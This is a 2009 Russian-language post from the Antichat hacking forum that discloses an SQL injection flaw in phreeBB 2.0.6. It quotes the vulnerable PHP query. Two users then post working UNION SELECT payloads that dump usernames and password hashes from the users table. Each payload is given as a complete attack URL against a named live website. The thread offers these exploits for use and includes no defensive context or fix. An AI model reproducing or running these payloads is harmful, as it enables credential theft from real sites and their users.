Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   phreeBB 2.0.6 (https://forum.antichat.xyz/showthread.php?t=137639)

Ded MustD!e 27.08.2009 09:30
phreeBB 2.0.6
 
Не путать с phpBB!

SQL-Inj

Продукт: phreeBB
Версия: 2.0.6
Уязвимый скрипт: viewthread.php

PHP код:
$result mysql_query("SELECT * FROM viewForums WHERE view=$id");
 $msgData mysql_fetch_array($result); 
Эксплойт:
Код:
-1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+
Пример:
Код:
http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9,10/**/from/**/users--+

HAXTA4OK 13.11.2009 12:28
А че дальше то недобил Дедуль)))))
чет случайно наткнулся)))У меня сорцов нету , не смог ни где скачать)((((((

Файл : viewforum.php
exploit :

Код:
-1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users--
Пример:
Код:
http://ilcuckold.altervista.org/forum/viewforum.php?id=-1+union+select+1,concat_ws(0x3a,userName,userPass),3,4,5,6,7,8+from+users--


Время: 10:37